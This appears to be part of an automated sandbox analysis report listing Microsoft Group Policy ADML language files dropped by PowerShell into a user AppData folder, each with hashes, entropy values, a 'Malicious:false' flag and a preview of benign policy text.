                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="PreventHandwritingErrorReports">Turn off handwriting recognition error reporting</string>.. <string id="PreventHandwritingErrorReports_Explain">Turns off the handwriting recognition error reporting tool.....The handwriting recognition error reporting tool enables users to report errors encountered in Tablet PC Input Panel. The tool generates error reports and transmits them to Microsoft over a secure connection. Microsoft uses these error reports to improve handwriting recognition in future versions of Windows

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\FeGIPCnK\Data\en-US\KDC.adml

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with very long lines (554), with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):10440
                                                                                                                                                                                                        Entropy (8bit):4.663520278145665
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:LeD5pmaMIjP+dQzot5fZeuGnu9rAEQNsVS3sYgovZ4v/4euVuY9+UDVxgACCmskc:Ep8QzgfZeu1905teYUANOKIk
                                                                                                                                                                                                        MD5:7783B0D4B182BE9230A649D6E8DC56AD
                                                                                                                                                                                                        SHA1:215263A87F861BD2D8263BAD8011C5DDA0357BEB
                                                                                                                                                                                                        SHA-256:DB2F6E21FDB453CD8E67C278038547D12EB5C58C1D0280776670D618AEDED64F
                                                                                                                                                                                                        SHA-512:1B13DB33C12191ECF4687C6DEAF76E4776A10AAB045150C2A85369B0AA5553ECF42524A585A2A33905D1B124C1108FF2CACCDFE9C86D8CBBA89FD37E37F8D996
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>KDC Settings</displayName>.. <description>Configuration settings for the Kerberos Key Distribution Center.</description>.. <resources>.. <stringTable>.. <string id="KDC">KDC</string>.. <string id="forestsearch">Use forest search order</string>.. <string id="forestsearch_explain">This policy setting defines the list of trusting forests that the Key Distribution Center (KDC) searches when attempting to resolve two-part service principal names (SPNs).....If you enable this policy setting, the KDC will search the forests in this list if it is unable to resolve a two-part SPN in the local forest. The forest search is performed by using a glo

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\FeGIPCnK\Data\en-US\Kerberos.adml

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with very long lines (840), with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):19138
                                                                                                                                                                                                        Entropy (8bit):4.73754316262114
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:7atR7siAzz45FWuozQV/hI+DklrjMvJK1ORt:ebksWnzkhI19OL
                                                                                                                                                                                                        MD5:AA29F707B1FE528F5F856EC64E771DAC
                                                                                                                                                                                                        SHA1:6F3F897807668918B8A6F7C4E78B17AA445070F9
                                                                                                                                                                                                        SHA-256:4148DF3125629ABE00141FACEF7519BBDE4D3877067A234F35C0A63B740810F6
                                                                                                                                                                                                        SHA-512:4281194C43BF70E7839FF63107549994D8C89D211317E30557B366C32E30F58505F91AD17E8073869579C6EADA056D8973CD25A489D929FAF796CAE42F5A874E
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>Kerberos Settings</displayName>.. <description>Configuration settings for the Kerberos authentication protocol.</description>.. <resources>.. <stringTable>.. <string id="kerberos">Kerberos</string>.. <string id="forestsearch">Use forest search order</string>.. <string id="forestsearch_explain">This policy setting defines the list of trusting forests that the Kerberos client searches when attempting to resolve two-part service principal names (SPNs).....If you enable this policy setting, the Kerberos client searches the forests in this list, if it is unable to resolve a two-part SPN. If a match is found, the Kerberos client requests a re

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\FeGIPCnK\Data\en-US\LanmanServer.adml

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with very long lines (552), with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):6322
                                                                                                                                                                                                        Entropy (8bit):4.728370721511469
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:LeD5pm8qDY/ixB4w28Divg6JR+CfREEM2eYJk2y3XTE68TpwQEOgRVLTMV:E9iUw2c0rUEk2yTEZpBmLg
                                                                                                                                                                                                        MD5:33F09CDADA6D62BAE3F0DC0A3E1A2C2A
                                                                                                                                                                                                        SHA1:62BEEE0D918637A68746741C74244FCF39D1A3FB
                                                                                                                                                                                                        SHA-256:3393D80184E3C251A2E8249C13BBBE99A9045AD37550D8497D960371964BF8B7
                                                                                                                                                                                                        SHA-512:DE12FA4C934B9A56C86FF7405D3DEBE1D8F3B4AB3ACDD419888FF2399FEDCABC42CFAF26EDA458C0B874D052327B1DC7BE8C454AA4DE0CF7C920F590C40C5BF0
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="Cat_LanmanServer">Lanman Server</string>.. <string id="Lbl_FollowShare">Allow hash publication only for shared folders on which BranchCache is enabled</string>.. <string id="Lbl_DisableOnAllShares">Disallow hash publication on all shared folders</string>.. <string id="Lbl_EnableOnAllShares">Allow hash publication for all shared folders</string>.. <string id="Pol_HashPublication">Hash Publication for BranchCache</string>.. <string id="Pol_HashPublication_Help">This policy setting specifies w

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\FeGIPCnK\Data\en-US\LeakDiagnostic.adml

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):1590
                                                                                                                                                                                                        Entropy (8bit):4.91680451974178
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:cgeD5x8gm8fKbXSr4eKUsXZ3W5/1n0BsIvFV:LeD5pmnCr4QCW1hCsIvFV
                                                                                                                                                                                                        MD5:FAB2C03A061CF266E4BF99D9AD8410CC
                                                                                                                                                                                                        SHA1:62C30ED88810E558C2C5B29DF833E0B84979F798
                                                                                                                                                                                                        SHA-256:1FAD47D1BCFC5110370B1E428F800DD67B65037C2C029C39355D1F0AF51B4712
                                                                                                                                                                                                        SHA-512:2B49196BE14CD1493F98BB4294D50CE42481D67A02357FD6F26067588B4D19B96D7D6677E5A3B6DA5A99329B7422BD5C257C591CBD6C773E5A106EE47E6A2909
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="WdiScenarioCategory">Windows Memory Leak Diagnosis</string>.. <string id="WdiScenarioExecutionPolicy">Configure Scenario Execution Level</string>.. <string id="WdiScenarioExecutionPolicyExplain">This policy setting determines whether Diagnostic Policy Service (DPS) diagnoses memory leak problems.....If you enable or do not configure this policy setting, the DPS enables Windows Memory Leak Diagnosis by default.....If you disable this policy setting, the DPS is not able to diagnose memory leak problems.....

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\FeGIPCnK\Data\en-US\LinkLayerTopologyDiscovery.adml

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with very long lines (460), with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):3646
                                                                                                                                                                                                        Entropy (8bit):4.907043755326407
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:cgeD5x8gm8fKIZNW4D5Drf3R5SMxeHJ/LLXdMD5ebqKrf3R5SfxeHJ/LLgX3jqS0:LeD5pmON3ljPep+sqajiep4X3jqSGvV
                                                                                                                                                                                                        MD5:92DBAD98F0E768C7BFE966BD839BB017
                                                                                                                                                                                                        SHA1:DE0047F6E6C1A639102804F0D9081783488BB331
                                                                                                                                                                                                        SHA-256:14DAFF44ECBEC76CDE21CCC68D5558BD6119A5F58C6884B9692B6341EAD643DD
                                                                                                                                                                                                        SHA-512:F74CAACA0D2CE8E4E8702E83E6F077C6BC17BC69CF2BE40698227FE003A7C1291F22D49CB3FEB50A8D418C1083EAE6767474F21AAC7F83A40620F6B461611723
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="LLTD_Category">Link-Layer Topology Discovery</string>.. <string id="LLTD_Category_Help">Configures all Link-Layer Topology Discovery components.</string>.. <string id="LLTD_EnableLLTDIO">Turn on Mapper I/O (LLTDIO) driver</string>.. <string id="LLTD_EnableLLTDIO_Help">This policy setting changes the operational behavior of the Mapper I/O network protocol driver.....LLTDIO allows a computer to discover the topology of a network it's connected to. It also allows a computer to initiate Quality-of-Servic

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\FeGIPCnK\Data\en-US\LocationProviderAdm.adml

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):1212
                                                                                                                                                                                                        Entropy (8bit):4.9162916170648305
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:24:2dgeD5eo8gWt4+3Fbef61yYr2XjEEgr2WMb/fLqI2LHIQIeQLUgH7IYLjXr2cE5n:cgeD5x8gm8fKBqTETqRXLqbLoQWLUgbU
                                                                                                                                                                                                        MD5:FE47798FE9B3F4C43E782DF1AF166A87
                                                                                                                                                                                                        SHA1:909EE6F13A9F43305857C64DF1F2B8C91797A60B
                                                                                                                                                                                                        SHA-256:F4EDEF9970D1E3EE016E880537DB88D7B6A3B5ABD142D791FC39D39FC4E1FFA9
                                                                                                                                                                                                        SHA-512:3487FA625323C52C6BB52C09051CE0C5E41A1EAB45448C5471B2378DFDF6E478DF36E3424F08946B6F1C516E795E138CC87166DF81B4D463B5E04166949FE14E
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="DisableWindowsLocationProvider">Turn off Windows Location Provider</string>.. <string id="DisableWindowsLocationProvider_Explain">.. This policy setting turns off the Windows Location Provider feature for this computer..... If you enable this policy setting, the Windows Location Provider feature will be turned off, and all programs on this computer will not be able to use the Windows Location Provider feature..... If you disable or do not configure this policy setting, all programs on this

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\FeGIPCnK\Data\en-US\Logon.adml

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 text, with very long lines (587), with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):16832
                                                                                                                                                                                                        Entropy (8bit):4.631442685712746
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:HD5n9zbzDznNtlY2iFwIcnBJGciF7BZXmhdtP0:nzbzDzn9YPJMGcitzmx0
                                                                                                                                                                                                        MD5:7DEB6528B7BF721DA0BC53B65116E4B2
                                                                                                                                                                                                        SHA1:999291B1970366D2256B0081EBE8420E6519D13E
                                                                                                                                                                                                        SHA-256:CFF8BFAD325C4F3BE418A491D37BB367E126F24EE22FA39C809C83AED6C07033
                                                                                                                                                                                                        SHA-512:BC22B74FF1FEA301961650160914422A5A986B7082C27140817E8ABE0E2720CB9578B8EF637182CBAE5CB7E3AC8481F4E334A815645E3F13A82163A7941FEC61
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="UseOEMBackground">Always use custom logon background</string> .. <string id="UseOEMBackground_Help">This policy setting ignores Windows Logon Background.....This policy setting may be used to make Windows give preference to a custom logon background. ....If you enable this policy setting, the logon screen always attempts to load a custom background instead of the Windows-branded logon background. ....If you disable or do not configure this policy setting, Windows uses the default Windows logon background or cu

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\FeGIPCnK\Data\en-US\MMC.adml

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with very long lines (374), with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):4806
                                                                                                                                                                                                        Entropy (8bit):4.701920186548574
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:LeD5pmQsFOr1sf4h/p1IXr5KQ6A735FlZ+HQsvYxyOsFV:EsFOriforIkQ6A7zlZ+HvvYxyOsn
                                                                                                                                                                                                        MD5:E7286B16AB9A79A941457D0E5F7AC2D9
                                                                                                                                                                                                        SHA1:7E41AA47B450F332DAC6A9AEE8B1021397ACC90F
                                                                                                                                                                                                        SHA-256:5CE95BDC6780550FAD262390A824CDB07D6B426683FE1E8AFA533D6A47A8E79B
                                                                                                                                                                                                        SHA-512:5BCDA870EF7DCEDA95D4C44B8EDB9DB08BB937D5D5FB07601DE231BA21C7B7902A8D74F6A33352132C0F5D2E84C47E9AE855290444B76EDD6A59792BD8BD67C2
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="MMC">Microsoft Management Console</string>.. <string id="MMC_ActiveXControl">ActiveX Control</string>.. <string id="MMC_ExtendView">Extended View (Web View)</string>.. <string id="MMC_ExtensionSnapins">Extension snap-ins</string>.. <string id="MMC_LinkToWeb">Link to Web Address</string>.. <string id="MMC_RESTRICT">Restricted/Permitted snap-ins</string>.. <string id="MMC_Restrict_Author">Restrict the user from entering author mode</string>.. <string id="MMC_restrict_Author_Explain"

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\FeGIPCnK\Data\en-US\MMCSnapIns2.adml

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with very long lines (332), with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):3258
                                                                                                                                                                                                        Entropy (8bit):4.817177716053599
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:cgeD5x8gm8fKqgONUGM7MG1T7yvG/sFO3hsFaSb7AqIAF9dFpgJcJTU8OiFQBeQs:LeD5pmnGCpZ7r/sFgsFaK735Sf/cMeFV
                                                                                                                                                                                                        MD5:181EDEAB7F0FA1FD7DA1D157121386D1
                                                                                                                                                                                                        SHA1:B4F9B4B91FD9D8EFA327E20516DE975892A706F1
                                                                                                                                                                                                        SHA-256:258D9502CBD3B2B6E342D1B705A17A6537865D066BEC2227BD4BD5A4D3E411F9
                                                                                                                                                                                                        SHA-512:99FF5FD5A9E50F1AE843845CC54E616F73DE24270261496087E902AB5AAA286ED9C9A19DCB230857774834DF20AAA2056D052D905F12ACBB338C845BFE8D1B9D
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="MMC_StorageManagerForSANSSnapIn">Storage Manager for SANs</string>.. <string id="MMC_StorageManagerForSANSSnapInExtension">Storage Manager for SANS Extension</string>.. <string id="MMC_FileServerResourceManagerSnapIn">File Server Resource Manager</string>.. <string id="MMC_FileServerResourceManagerSnapInExtension">File Server Resource Manager Extension</string>.. <string id="MMC_DiskManagementSnapInExtension">Disk Management Extension</string>.. <string id="MMC_DFSSnapIn">DFS Management</st

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\FeGIPCnK\Data\en-US\MMCSnapins.adml

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with very long lines (333), with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):10156
                                                                                                                                                                                                        Entropy (8bit):4.902850417863983
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:Eha8zqIFaazk71nt3xuH+6gqb7UFfFaK7Oz/cExtqRACAmn:u2IFWke6gqHBcR9r
                                                                                                                                                                                                        MD5:A30AB3FB1BA97BFD3AD477AD18D0BE28
                                                                                                                                                                                                        SHA1:9175E307ED491957EEB303BC6BEB8F6ABB2EB0FB
                                                                                                                                                                                                        SHA-256:48663270C2B2ED9475692772CBF5B12B635D75FA293E3059F8B81D8B4D02382E
                                                                                                                                                                                                        SHA-512:13DD57C61196B2DAC93F8C4FF602ACEA6644B4DEA08FF96B2770C50EC98CE73A9F9C3CEA3BF29ED7A3E5089474F27653BFBBDFC515FB378965D107DDA252BF0D
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="MMC_ActiveDirDomTrusts">Active Directory Domains and Trusts</string>.. <string id="MMC_ActiveDirSitesServices">Active Directory Sites and Services</string>.. <string id="MMC_ActiveDirUsersComp">Active Directory Users and Computers</string>.. <string id="MMC_ADMComputers">Administrative Templates (Computers)</string>.. <string id="MMC_ADMUsers">Administrative Templates (Users)</string>.. <string id="MMC_ADSI">ADSI Edit</string>.. <string id="MMC_AppleTalkRouting">AppleTalk Routing</stri

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\FeGIPCnK\Data\en-US\MSDT.adml

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):4822
                                                                                                                                                                                                        Entropy (8bit):4.7368864262977635
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:LeD5pmtzIVVV78jVqaqGCs1HVVpLg2uw+F8c6mqSaM17CsQe2ce9e2bgzKDB2QSV:EL8jVqaTpCwSfqSaQpQe2c8e2SuS3l
                                                                                                                                                                                                        MD5:CD6F4B94C65A6A5F650EEDCC4108C1F9
                                                                                                                                                                                                        SHA1:BB95196861D768DE33C1A574CD3C3B05DE281B8B
                                                                                                                                                                                                        SHA-256:91692970671C4A0AC5A872A787F7C8D5B7C69BC36503D2815408443EA7B820DB
                                                                                                                                                                                                        SHA-512:41E53997E7FE19552B50DAE9B3E9DDC61289B69DFBD05A837A05E023D67B103DE17BC794CA897BB69DB59CBA6564471C26AD9B0C31811065E98C2270B1D67D5E
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="WdiScenarioCategory">Microsoft Support Diagnostic Tool</string>.. <string id="WdiScenarioExecutionPolicy">Microsoft Support Diagnostic Tool: Configure execution level</string>.. <string id="WdiScenarioExecutionPolicyExplain">This policy setting determines the execution level for Microsoft Support Diagnostic Tool.....Microsoft Support Diagnostic Tool (MSDT) gathers diagnostic data for analysis by support professionals.....If you enable this policy setting, administrators can use MSDT to collect and send di

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\FeGIPCnK\Data\en-US\MSI.adml

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with very long lines (499), with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):30569
                                                                                                                                                                                                        Entropy (8bit):4.629506484487412
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:S3fWPIaG5EBoj8lK1I8DBkpkBLNPn4WCMIb53woYlHMwIxTQMNBN2wJKPCoz1Nqb:7wI8DhTSb53w/4DRb
                                                                                                                                                                                                        MD5:281E7FFCCBCB02FC616FEBF6F291B411
                                                                                                                                                                                                        SHA1:EB918DDA656626758F3B4B993C12CB04BA7F18E3
                                                                                                                                                                                                        SHA-256:BEA0490CA9E830B84869A273D0011683A54FA4E92E0EFF63B9F123CFFFC40C60
                                                                                                                                                                                                        SHA-512:6C932E4F13F9FE7C0C38A92C85808138C8ACB0CA925A8B5B149CA3C0F081B90112C52A165E37DEB5A400E300386108A9CC8D8F75D68D697798E34B40325E270A
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="AllowLockdownBrowse">Allow users to browse for source while elevated</string>.. <string id="AllowLockdownBrowse_Help">This policy setting allows users to search for installation files during privileged installations.....If you enable this policy setting, the Browse button in the "Use feature from" dialog box is enabled. As a result, users can search for installation files even when the installation program is running with elevated system privileges.....Because the installation is running with elevated system p

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\FeGIPCnK\Data\en-US\MediaCenter.adml

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):1133
                                                                                                                                                                                                        Entropy (8bit):4.94325326862628
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:24:2dgeD5eo8gWt4+3Fbef61yDIuQF6FVMFV:cgeD5x8gm8fKbyqFV
                                                                                                                                                                                                        MD5:7EFC78CEE6A256186F169D12466F667D
                                                                                                                                                                                                        SHA1:C190C0FAB77A5095D595ED65CF1E0ADF81A9AE7E
                                                                                                                                                                                                        SHA-256:DD91079C05795BD2BBA3C3F0A7167A5B8760A540C2E3000F379D4058D2E67258
                                                                                                                                                                                                        SHA-512:B5A90208C5A69F90DB1F7C90B161E066FFDFF2761BECC314D1611709EFE31848D250A45EFFBF60356E71C00370A99252CE8D4ECB804683575528F5E6FCE7432A
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="MediaCenter">Windows Media Center</string>.. <string id="MediaCenter_Disable">Do not allow Windows Media Center to run</string>.. <string id="MediaCenter_Disable_Help">This policy setting allows or prevents Windows Media Center to run.....Windows Media Center is a digital media player and video recorder that allows users to organize and play music and videos, and to view and record live television.....If you enable this policy setting, Windows Media Center will not run.....If you disable or do not configu

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\FeGIPCnK\Data\en-US\MobilePCMobilityCenter.adml

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):1205
                                                                                                                                                                                                        Entropy (8bit):4.9534177597350935
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:24:2dgeD5eo8gWt4+3Fbef61yLwjaMb3zjS/RmN3FooRFV:cgeD5x8gm8fKkqaM3a/RmNqAFV
                                                                                                                                                                                                        MD5:F4ED8285AC3F6D33796ECEB5A7D654D7
                                                                                                                                                                                                        SHA1:8856483D9DE028B8ADED5807E7F786E61BA9A969
                                                                                                                                                                                                        SHA-256:94D9C7AAF148F31B6129B5567F963832427DE828DCD7E0B31F1BCBDBD5DBED3C
                                                                                                                                                                                                        SHA-512:6B7A56459CCC4DDE7A3EE144334295653B394D5D6499E98FC0184244D6FE4B3BE38324492378EA88C4851133678287CD4C5381120F83488AE639279CBFC8A328
                                                                                                                                                                                                        Malicious:false
